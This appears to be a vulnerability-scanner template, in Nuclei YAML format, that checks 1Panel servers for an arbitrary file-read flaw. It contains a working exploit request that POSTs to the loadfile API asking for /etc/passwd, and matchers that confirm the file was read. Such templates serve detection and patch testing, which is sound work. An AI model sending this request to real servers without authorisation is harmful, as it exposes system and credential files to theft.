id: 1panel-loadfile-fileread

info:
  name: 1Panel loadfile 后台文件读取漏洞
  author: SleepingBag945
  severity: high
  description: |-
    1Panel后台存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感信息文件
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/1panel-loadfile-fileread.yaml

http:
  - raw:
      - |
        POST /api/v1/file/loadfile HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"paht":"/etc/passwd"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"